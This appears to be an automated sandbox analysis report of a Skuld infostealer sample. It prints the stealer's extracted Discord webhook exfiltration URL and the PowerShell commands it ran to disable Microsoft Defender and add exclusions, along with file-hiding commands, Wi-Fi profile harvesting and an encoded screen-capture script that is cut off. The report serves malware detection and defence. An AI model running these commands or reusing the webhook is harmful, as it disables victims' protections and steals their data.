skuld | 5ab34085e73ef9e3075544da3ce29acff67f108ab6a710ffcf385351d627d839

Analysis

max time kernel
94s
max time network
96s
platform
windows10-2004_x64
resource
win10v2004-20240704-en
resource tags

arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system
submitted
06-07-2024 20:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
Size

9.5MB
MD5

cf96d1fe38389340a7bd6f25217b705a
SHA1

ac519311c71a14f076fb48e8dea1744ef4ff747f
SHA256

5ab34085e73ef9e3075544da3ce29acff67f108ab6a710ffcf385351d627d839
SHA512

30ee3f6f37d20fd1bc934902a9efd1b72f2ca9164cdd46658531f1f49d7ace1ecdbe4da8c31316738a56a91500329139942f19eaaf48046934b13470d5fce9d2
SSDEEP

98304:3DmUoFpgdugturl7vagvw3ceEDfCTwp51T/h:KZFpgd27vagI3WDV/

Score

10^/10

skuld execution persistence privilege_escalation spyware stealer

Malware Config

Extracted

Family

skuld

https://discord.com/api/webhooks/1256865196069228615/QxBVP3EAM1JfTSfEhMwT_EexduQvdx1myuvzzU783TE_HbtKV3C_Y3TRq6y7AyBo5uRV

Signatures

Skuld stealer
An info stealer written in Go lang.
stealer skuld

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3316	powershell.exe
4484	powershell.exe

Drops file in Drivers directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
File opened for modification	C:\Windows\System32\drivers\etc\hosts	attrib.exe

Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-771719357-2485960699-3367710044-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Realtek HD Audio Universal Service = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Protect\\SecurityHealthSystray.exe"	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	discord.com
4	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
10	ip-api.com

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1308	wmic.exe

GoLang User-Agent 1 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

description	flow	ioc
HTTP User-Agent header	11	Go-http-client/1.1

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 5c0000000100000004000000001000001900000001000000100000002fe1f70bb05d7c92335bc5e05b984da60f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f63030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e814000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e20000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae4747e000000010000000800000000c001b39667d6017f000000010000000c000000300a06082b060105050703091d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df062000000010000002000000016af57a9f676b0ab126095aa5ebadef22ab31119d644ac95cd4b93dbf3f26aeb0b0000000100000030000000440069006700690043006500720074002000420061006c00740069006d006f0072006500200052006f006f007400000009000000010000003e000000303c06082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030906082b0601050507030106082b0601050507030853000000010000007f000000307d3020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe

Suspicious behavior: EnumeratesProcesses 12 IoCs

pid	Process
628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
4484	powershell.exe
4484	powershell.exe
3472	powershell.exe
3472	powershell.exe
3316	powershell.exe
3316	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
Token: SeDebugPrivilege	4484	powershell.exe
Token: SeIncreaseQuotaPrivilege	2692	wmic.exe
Token: SeSecurityPrivilege	2692	wmic.exe
Token: SeTakeOwnershipPrivilege	2692	wmic.exe
Token: SeLoadDriverPrivilege	2692	wmic.exe
Token: SeSystemProfilePrivilege	2692	wmic.exe
Token: SeSystemtimePrivilege	2692	wmic.exe
Token: SeProfSingleProcessPrivilege	2692	wmic.exe
Token: SeIncBasePriorityPrivilege	2692	wmic.exe
Token: SeCreatePagefilePrivilege	2692	wmic.exe
Token: SeBackupPrivilege	2692	wmic.exe
Token: SeRestorePrivilege	2692	wmic.exe
Token: SeShutdownPrivilege	2692	wmic.exe
Token: SeDebugPrivilege	2692	wmic.exe
Token: SeSystemEnvironmentPrivilege	2692	wmic.exe
Token: SeRemoteShutdownPrivilege	2692	wmic.exe
Token: SeUndockPrivilege	2692	wmic.exe
Token: SeManageVolumePrivilege	2692	wmic.exe
Token: 33	2692	wmic.exe
Token: 34	2692	wmic.exe
Token: 35	2692	wmic.exe
Token: 36	2692	wmic.exe
Token: SeIncreaseQuotaPrivilege	2692	wmic.exe
Token: SeSecurityPrivilege	2692	wmic.exe
Token: SeTakeOwnershipPrivilege	2692	wmic.exe
Token: SeLoadDriverPrivilege	2692	wmic.exe
Token: SeSystemProfilePrivilege	2692	wmic.exe
Token: SeSystemtimePrivilege	2692	wmic.exe
Token: SeProfSingleProcessPrivilege	2692	wmic.exe
Token: SeIncBasePriorityPrivilege	2692	wmic.exe
Token: SeCreatePagefilePrivilege	2692	wmic.exe
Token: SeBackupPrivilege	2692	wmic.exe
Token: SeRestorePrivilege	2692	wmic.exe
Token: SeShutdownPrivilege	2692	wmic.exe
Token: SeDebugPrivilege	2692	wmic.exe
Token: SeSystemEnvironmentPrivilege	2692	wmic.exe
Token: SeRemoteShutdownPrivilege	2692	wmic.exe
Token: SeUndockPrivilege	2692	wmic.exe
Token: SeManageVolumePrivilege	2692	wmic.exe
Token: 33	2692	wmic.exe
Token: 34	2692	wmic.exe
Token: 35	2692	wmic.exe
Token: 36	2692	wmic.exe
Token: SeIncreaseQuotaPrivilege	4836	wmic.exe
Token: SeSecurityPrivilege	4836	wmic.exe
Token: SeTakeOwnershipPrivilege	4836	wmic.exe
Token: SeLoadDriverPrivilege	4836	wmic.exe
Token: SeSystemProfilePrivilege	4836	wmic.exe
Token: SeSystemtimePrivilege	4836	wmic.exe
Token: SeProfSingleProcessPrivilege	4836	wmic.exe
Token: SeIncBasePriorityPrivilege	4836	wmic.exe
Token: SeCreatePagefilePrivilege	4836	wmic.exe
Token: SeBackupPrivilege	4836	wmic.exe
Token: SeRestorePrivilege	4836	wmic.exe
Token: SeShutdownPrivilege	4836	wmic.exe
Token: SeDebugPrivilege	4836	wmic.exe
Token: SeSystemEnvironmentPrivilege	4836	wmic.exe
Token: SeRemoteShutdownPrivilege	4836	wmic.exe
Token: SeUndockPrivilege	4836	wmic.exe
Token: SeManageVolumePrivilege	4836	wmic.exe
Token: 33	4836	wmic.exe
Token: 34	4836	wmic.exe
Token: 35	4836	wmic.exe

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 628 wrote to memory of 5008	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	83
PID 628 wrote to memory of 5008	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	83
PID 628 wrote to memory of 4484	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	85
PID 628 wrote to memory of 4484	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	85
PID 628 wrote to memory of 2692	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	87
PID 628 wrote to memory of 2692	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	87
PID 628 wrote to memory of 4516	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	89
PID 628 wrote to memory of 4516	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	89
PID 628 wrote to memory of 4836	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	92
PID 628 wrote to memory of 4836	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	92
PID 628 wrote to memory of 3472	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	94
PID 628 wrote to memory of 3472	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	94
PID 628 wrote to memory of 1308	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	96
PID 628 wrote to memory of 1308	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	96
PID 628 wrote to memory of 1248	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	98
PID 628 wrote to memory of 1248	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	98
PID 628 wrote to memory of 5116	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	100
PID 628 wrote to memory of 5116	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	100
PID 628 wrote to memory of 876	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	102
PID 628 wrote to memory of 876	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	102
PID 628 wrote to memory of 2120	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	106
PID 628 wrote to memory of 2120	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	106
PID 628 wrote to memory of 3316	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	108
PID 628 wrote to memory of 3316	628	2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe	108
PID 3316 wrote to memory of 3444	3316	powershell.exe	110
PID 3316 wrote to memory of 3444	3316	powershell.exe	110
PID 3444 wrote to memory of 3132	3444	csc.exe	111
PID 3444 wrote to memory of 3132	3444	csc.exe	111

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5008	attrib.exe
4516	attrib.exe
1248	attrib.exe
876	attrib.exe

C:\Users\Admin\AppData\Local\Temp\2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
"C:\Users\Admin\AppData\Local\Temp\2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe"
1⤵
- Drops file in Drivers directory
- Adds Run key to start application
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:628
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
  2⤵
  - Views/modifies file attributes
  PID:5008
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\2024-07-06_cf96d1fe38389340a7bd6f25217b705a_ngrbot_poet-rat_snatch.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4484
- C:\Windows\System32\Wbem\wmic.exe
  wmic os get Caption
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2692
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe
  2⤵
  - Views/modifies file attributes
  PID:4516
- C:\Windows\System32\Wbem\wmic.exe
  wmic cpu get Name
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4836
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:3472
- C:\Windows\System32\Wbem\wmic.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  PID:1308
- C:\Windows\system32\attrib.exe
  attrib -r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:1248
- C:\Windows\System32\Wbem\wmic.exe
  wmic csproduct get UUID
  2⤵
  PID:5116
- C:\Windows\system32\attrib.exe
  attrib +r C:\Windows\System32\drivers\etc\hosts
  2⤵
  - Drops file in Drivers directory
  - Views/modifies file attributes
  PID:876
- C:\Windows\system32\netsh.exe
  netsh wlan show profiles
  2⤵
  - Event Triggered Execution: Netsh Helper DLL
  PID:2120
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHM